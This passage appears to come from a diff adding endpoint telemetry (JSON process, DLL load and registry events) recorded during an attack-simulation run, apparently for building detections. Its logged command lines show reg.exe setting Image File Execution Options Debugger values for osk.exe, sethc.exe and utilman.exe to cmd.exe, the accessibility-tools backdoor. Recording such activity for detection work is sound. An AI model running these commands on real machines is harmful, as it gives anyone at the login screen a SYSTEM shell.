"{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "process", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571822300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4816, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571824540000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": 
"ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4564, + "ppid": 4816, + "process_name": "reg.exe", + 
"process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571824630000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-001062235101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824490000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 
4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "registry", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", + "registry_value": "osk.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "registry", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", + "registry_value": "Debugger", + 
"timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "process", + "pid": 4564, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" + }, + { + "event_type": "process", + "pid": 4816, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6884, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571824790000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6884, + "process_name": "cmd.exe", + 
"process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "event_type": "process", + "pid": 6884, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571824800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5648, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571825390000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1284, + "ppid": 5648, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571825470016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}", + "unique_ppid": 
"{42FC7E13-CB3E-5C05-0000-0010122A5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + 
{ + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "registry", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", + "registry_value": "sethc.exe", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "registry", + "pid": 1284, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "process", + "pid": 1284, + "process_name": "reg.exe", + 
"process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571825420000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" + }, + { + "event_type": "process", + "pid": 5648, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5036, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571825639984, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": 
"image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "event_type": "process", + "pid": 5036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571825580000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7448, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571826260000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + 
"image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3444, + "ppid": 7448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571826340000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + 
"image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826200016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": 
"C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "registry", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", + "registry_value": "utilman.exe", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "registry", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + "event_type": "process", + "pid": 3444, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" + }, + { + 
"event_type": "process", + "pid": 7448, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571826360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6748, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571826509984, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": 